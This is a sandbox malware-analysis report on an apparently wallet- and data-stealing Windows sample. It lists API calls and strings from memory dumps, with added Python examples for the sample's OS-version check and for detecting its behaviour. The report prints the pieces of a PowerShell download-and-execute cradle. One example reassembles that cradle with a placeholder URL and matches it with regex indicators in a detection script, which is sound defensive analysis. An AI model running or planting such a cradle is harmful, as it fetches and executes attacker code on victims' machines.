                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 1a0e5b7a520c133cbba4f1e80366e5bdac21dff8dfe78192a4107baf899f555b
                        • Instruction ID: 12ccdcbad67dfdd66acb2e00fe0570130e96934ce30dc1ab2095afdccf71d88a
                        • Opcode Fuzzy Hash: 1a0e5b7a520c133cbba4f1e80366e5bdac21dff8dfe78192a4107baf899f555b
                        • Instruction Fuzzy Hash: AB014FB5A45304BBDB00DBE4DD6AFAAF7BCEB48701F104455FA0497290EA7599009B91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A773B
                        • RegOpenKeyExA.ADVAPI32(80000002,015AB690,00000000,00020119,009A76B9), ref: 009A775B
                        • RegQueryValueExA.ADVAPI32(009A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009A777A
                        • RegCloseKey.ADVAPI32(009A76B9), ref: 009A7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 5e6f06e47fc9594ebf6a269b2dd1f5e0642f1cbee3eda3df006fcc7baf37b573
                        • Instruction ID: f1d22282363d8a94a10261309c904f3396ec688a8a139cb48a8d585c7a7bd085
                        • Opcode Fuzzy Hash: 5e6f06e47fc9594ebf6a269b2dd1f5e0642f1cbee3eda3df006fcc7baf37b573
                        • Instruction Fuzzy Hash: 550162B9A40308BBDB00DFE0DC5AFAEF7B8EB48700F004559FA05A7281EA715A008B91
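                        The two functions above share one shape: allocate a 0x104-byte buffer from the process heap, open a key under HKEY_LOCAL_MACHINE (0x80000002) with samDesired 0x20119, read one REG_SZ value into the buffer and close the key. The value name visible in the second function is CurrentBuildNumber, and the only string in the first is "Windows 11", which is what a build-number threshold produces. The subkey string itself (the argument at 015AB690) is not shown in the report; the example below assumes the conventional location, SOFTWARE\Microsoft\Windows NT\CurrentVersion. This is an added example, not code from the report or from the sample, and it is written to run anywhere: the live registry read happens only on Windows, the mask decoding and the build mapping are pure functions.

```python
"""Reproduce the OS-version fingerprint seen in the two functions above.

Added example, not code from the report or the sample. The subkey string
(015AB690) is not visible in the report, so the conventional location of
CurrentBuildNumber is assumed below.
"""
import sys
from typing import List, Optional

# Assumption: the subkey the sample opens under HKLM (0x80000002).
CURRENT_VERSION_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"

# Individual registry access rights (winnt.h) used to decode samDesired.
KEY_RIGHTS = {
    0x0001: "KEY_QUERY_VALUE",
    0x0002: "KEY_SET_VALUE",
    0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS",
    0x0010: "KEY_NOTIFY",
    0x0020: "KEY_CREATE_LINK",
    0x0100: "KEY_WOW64_64KEY",
    0x0200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}
KEY_READ = 0x20019  # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY


def decode_sam_desired(mask: int) -> List[str]:
    """Turn a raw RegOpenKeyEx samDesired value (e.g. 0x20119) into right names."""
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    for bit, name in sorted(KEY_RIGHTS.items()):
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:  # anything left is not a documented registry right
        names.append(f"0x{mask:X}")
    return names


def product_from_build(build: int) -> str:
    """Map CurrentBuildNumber to a marketing name the way a build-number check does.

    ProductName under the same key still reads "Windows 10 ..." on Windows 11,
    which is why a build threshold is used to tell the two apart.
    """
    if build >= 22000:
        return "Windows 11"
    if build >= 10240:
        return "Windows 10"
    if build == 9600:
        return "Windows 8.1"
    if build == 9200:
        return "Windows 8"
    if build in (7600, 7601):
        return "Windows 7"
    return f"unknown (build {build})"


def read_build_number() -> Optional[int]:
    """Read CurrentBuildNumber with the same view the sample requests.

    Returns None off Windows. KEY_WOW64_64KEY asks for the 64-bit registry
    view from a 32-bit process, which is what 0x20119 selects in the report.
    """
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only module, imported lazily

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CURRENT_VERSION_KEY, 0,
                        winreg.KEY_READ | winreg.KEY_WOW64_64KEY) as key:
        value, _value_type = winreg.QueryValueEx(key, "CurrentBuildNumber")
    return int(value)


def fingerprint(build: Optional[int] = None) -> str:
    """Full pipeline: live registry read on Windows, or a supplied build for testing."""
    if build is None:
        build = read_build_number()
    if build is None:
        return "not a Windows host"
    return product_from_build(build)


if __name__ == "__main__":
    print("0x20119 =", " | ".join(decode_sam_desired(0x20119)))
    print(fingerprint())
```

                        The build ranges are client builds only: Windows Server shares them (Server 2022 is build 20348, which this mapping would call "Windows 10"), so a fingerprint that must separate server from client also reads the InstallationType value under the same key.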
                        APIs
                        • memset.MSVCRT ref: 009A40D5
                        • RegOpenKeyExA.ADVAPI32(80000001,015BD138,00000000,00020119,?), ref: 009A40F4
                        • RegQueryValueExA.ADVAPI32(?,015BDC20,00000000,00000000,00000000,000000FF), ref: 009A4118
                        • RegCloseKey.ADVAPI32(?), ref: 009A4122
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4147
                        • lstrcat.KERNEL32(?,015BDCC8), ref: 009A415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: e11c9dc26b87373c2431624ee1e02f00ddfbd1b9454d624900b6193a4460d11f
                        • Instruction ID: 13ecb671793db5b82f96d7ca5a8d877508588b5bf744090eafcbb38182cd54d4
                        • Opcode Fuzzy Hash: e11c9dc26b87373c2431624ee1e02f00ddfbd1b9454d624900b6193a4460d11f
                        • Instruction Fuzzy Hash: 2B4195B6D101086BDB14EBA0DC56FEEB33DBB89300F408559B61657181FE755B888BD2
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                        • LocalFree.KERNEL32(0099148F), ref: 00999A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 33f215fa6700b9b71c8570c9bd0cc3676245c5b2c1287c759c384db0338ae3e5
                        • Instruction ID: 1561c91ca0e1d1fd0ac7893fe8f1a26195839f46f588512957faa618388e1372
                        • Opcode Fuzzy Hash: 33f215fa6700b9b71c8570c9bd0cc3676245c5b2c1287c759c384db0338ae3e5
                        • Instruction Fuzzy Hash: 35312B74A01209EFDF14CF98C895BAEB7F9FF48341F108158E901A7290DB78AA41CFA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: 6e81b3d9aa557a08bd162729e85e81e230ab1624c1a120780047b8f6c4fda46a
                        • Instruction ID: 1ea3a744f1888565ec488a26f2d4c9f7d5cce3bff8aa3a264647bd9401c9fe81
                        • Opcode Fuzzy Hash: 6e81b3d9aa557a08bd162729e85e81e230ab1624c1a120780047b8f6c4fda46a
                        • Instruction Fuzzy Hash: F641E9B150475C9FDB218B24CD84FFB7BEDAF86704F1444E8E58A8A182D2759A44DFA0
                        APIs
                        • lstrcat.KERNEL32(?,015BDBD8), ref: 009A47DB
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4801
                        • lstrcat.KERNEL32(?,?), ref: 009A4820
                        • lstrcat.KERNEL32(?,?), ref: 009A4834
                        • lstrcat.KERNEL32(?,015AB360), ref: 009A4847
                        • lstrcat.KERNEL32(?,?), ref: 009A485B
                        • lstrcat.KERNEL32(?,015BD118), ref: 009A486F
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009A8D90: GetFileAttributesA.KERNEL32(00000000,?,00991B54,?,?,009B564C,?,?,009B0E1F), ref: 009A8D9F
                          • Part of subcall function 009A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009A4580
                          • Part of subcall function 009A4570: RtlAllocateHeap.NTDLL(00000000), ref: 009A4587
                          • Part of subcall function 009A4570: wsprintfA.USER32 ref: 009A45A6
                          • Part of subcall function 009A4570: FindFirstFileA.KERNEL32(?,?), ref: 009A45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: dc839f7599ecbc38f9ad450175e271d4f8751556a487834b5bf09cb8fd5f061a
                        • Instruction ID: 4f26fcbd9cafd3fc0df9207016253cfc4408f0920d62449cb1210cfa05798bf8
                        • Opcode Fuzzy Hash: dc839f7599ecbc38f9ad450175e271d4f8751556a487834b5bf09cb8fd5f061a
                        • Instruction Fuzzy Hash: 0C3151B2D0020867CB14FBB0DC95FEE737CAB98700F404989B75996091EE74A789CBD6
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A2D85
                        Strings
                        • ')", xrefs: 009A2CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 009A2CC4
                        • <, xrefs: 009A2D39
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 009A2D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 49d35e3d704cfb88ec600b0dc697d096c8a8146fc97aaefdac9f604ff632c61c
                        • Instruction ID: 1a11c449ba37bfff9afd16a8eaec4106397268f15dd7fe66751ee088208e193c
                        • Opcode Fuzzy Hash: 49d35e3d704cfb88ec600b0dc697d096c8a8146fc97aaefdac9f604ff632c61c
                        • Instruction Fuzzy Hash: 3541DC71D102089BDB54EFA4C896BEEBB78AF91300F504119F006A7191EF746A4ACFD5
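                        The strings in the function above are the pieces of a PowerShell download cradle: the 32-bit PowerShell path, the fragment -nop -c "iex(New-Object Net.WebClient).DownloadString(' and the closing ')". The lstrcpy/lstrcat subcalls join them around a URL that the report does not show, and ShellExecuteEx is called with cbSize 0x3C, which is sizeof(SHELLEXECUTEINFOA) for a 32-bit process. The example below is added here and is not code from the report or the sample: it rebuilds the command line from those fragments (with a placeholder URL, since the real one is not in the report) and then runs a small classifier over constructed process-creation events of the kind Sysmon Event ID 1 or Security 4688 with command-line auditing would record.

```python
"""Rebuild the PowerShell download cradle the function above assembles and
flag it in process-creation telemetry.

Added example, not code from the report or the sample. The URL is a
placeholder: the report does not show what the sample concatenates between
the two string fragments.
"""
import re
from typing import Dict, List

# String fragments as they appear in the report (xrefs 009A2D04, 009A2CC4, 009A2CB3).
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""


def build_cradle(url: str) -> str:
    """Concatenate the fragments the way the lstrcat chain does; the result is
    the command line a process-creation log would record."""
    return f'"{POWERSHELL}" {CRADLE_PREFIX}{url}{CRADLE_SUFFIX}'


# Detection side: independent indicators, each tolerant of case and aliases.
INDICATORS = [
    ("iex", re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)),
    ("webclient", re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.IGNORECASE)),
    ("downloadstring", re.compile(r"\.downloadstring\s*\(", re.IGNORECASE)),
    ("noprofile", re.compile(r"(?<![\w-])-nop(?:rofile)?\b", re.IGNORECASE)),
]
URL_RE = re.compile(r"downloadstring\s*\(\s*['\"]?(?P<url>[a-z]+://[^'\")\s]+)", re.IGNORECASE)
CRADLE_CORE = {"iex", "webclient", "downloadstring"}  # all three = execute fetched text


def classify(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event (Sysmon EID 1 / 4688 style fields)."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    url = URL_RE.search(cmd)
    if CRADLE_CORE <= set(hits):
        verdict = "download-cradle"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "indicators": hits,
        "url": url.group("url") if url else None,
        "parent": event.get("ParentImage"),
    }


# Constructed sample events (not taken from the report's capture).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # shape of what the sample launches via ShellExecuteEx
        "Image": POWERSHELL,
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": build_cradle("http://example.invalid/stage2.ps1"),
    },
    {   # ordinary scheduled-task use: one weak indicator only
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # same cradle with the cmdlet spelled out and the full class name
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'powershell -w hidden -nop -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString(\'https://example.invalid/a\')"',
    },
]


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the classifier over a batch and return only non-benign results."""
    return [r for r in map(classify, events) if r["verdict"] != "benign"]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

                        The indicator set is deliberately narrow to the cradle shape on this page; the parent field is carried through because a PowerShell child of an unsigned binary in a user profile, as in the first constructed event, is the higher-fidelity signal once the cradle itself is obfuscated.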
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00999F41
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 6817c4e73d317504258d45d751a2d1b48f392d4465fe69af92ceb6878555bd62
                        • Instruction ID: b6577a533ae695952aaf8271727943e75a1c521c4902379c79aeddd8971f2768
                        • Opcode Fuzzy Hash: 6817c4e73d317504258d45d751a2d1b48f392d4465fe69af92ceb6878555bd62
                        • Instruction Fuzzy Hash: C2612F71A102489FDF24EFA8CD96FEE7775AF85304F008518F90A5B191EB746A05CB92
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 009A696C
                        • sscanf.NTDLL ref: 009A6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009A69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009A69C0
                        • ExitProcess.KERNEL32 ref: 009A69DA
                        Memory Dump Source
